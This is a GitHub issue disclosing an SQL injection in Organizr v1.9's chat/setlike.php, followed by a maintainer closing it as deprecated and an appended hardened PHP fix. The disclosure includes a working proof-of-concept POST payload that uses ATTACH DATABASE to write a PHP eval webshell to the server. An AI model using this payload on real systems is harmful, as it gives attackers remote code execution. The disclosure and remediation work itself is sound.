
SQLI(RCE)_1 in Organizr-v1.9 #1998

Closed
xjzzzxx opened this issue Jul 12, 2024 · 1 comment


xjzzzxx commented Jul 12, 2024

Hello,

I would like to report an SQLi vulnerability in Organizr-v1.9. This vulnerability can lead to RCE.

Analysis

The path of the vulnerability: chat/setlike.php

$messageid = $_POST["messageid"];	// Line 3(Source)
...
$db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'");  // Line 36(Sink)

There is no checking or filtering between the source and the sink, which results in an SQLi vulnerability.

Permission Description

The vulnerability itself does not require any permissions. (No permissions required)

However, the initial state of Organizr-v1.9 does not enable Chat, so the data table "chatpack-log" does not exist. To turn on this switch, administrator privileges are required.

You can enable it in the management menu or by sending the following request:

POST /ajax.php?a=update-config

Data: authType=internal&chat=true

Then visit http://url/chat.php and enter something (no permissions required), and now we have the table "chatpack-log".

PoC

POST /chat/setlike.php

Data:

messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /*

Note that we used this vulnerability to write a webshell named shell.php to the server, which actually causes RCE.

Manual verification (screenshots omitted)
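As an added example (not Organizr's code and not part of the report above), a hardened form of the source-to-sink pattern quoted from chat/setlike.php: the id is validated as a positive integer and then bound through a prepared statement, so the request value can never become part of the query text. It assumes $db is a PDO handle to the SQLite database; the function name set_like is illustrative.

```php
<?php
// Added example, not Organizr's code. Hardened replacement for the pattern
//   $messageid = $_POST["messageid"];
//   $db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'");
// Assumption: $db is a PDO connection to the SQLite database used by the chat.

function set_like(PDO $db, array $post): bool
{
    // 1. Validate the type before the value goes anywhere near SQL. A message
    //    id must be a positive integer, so a string such as
    //    "1'; ATTACH DATABASE ..." is rejected here with a 400.
    $messageid = filter_var(
        $post['messageid'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($messageid === false) {
        http_response_code(400);
        return false;
    }

    // 2. Use a prepared statement and bind the value as an integer parameter.
    //    The query text is fixed at prepare time; the id travels as data, so
    //    no amount of quoting or statement chaining in the input can change it.
    $stmt = $db->prepare("UPDATE chatpack_log SET liked = '0' WHERE id = :id");
    $stmt->bindValue(':id', $messageid, PDO::PARAM_INT);
    return $stmt->execute();
}

// Call site, as the original script would use it.
// set_like($db, $_POST);
```

Defence in depth for the ATTACH DATABASE step shown in the PoC (an assumption about deployment, not something the report states): the web server account should not be able to create files under the document root, so even a successful injection could not drop a .php file where the server would execute it.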

@tronyx
Sponsor Collaborator

tronyx commented Jul 12, 2024

1.X is deprecated, no longer supported, and should not be used.

@tronyx tronyx closed this as completed Jul 12, 2024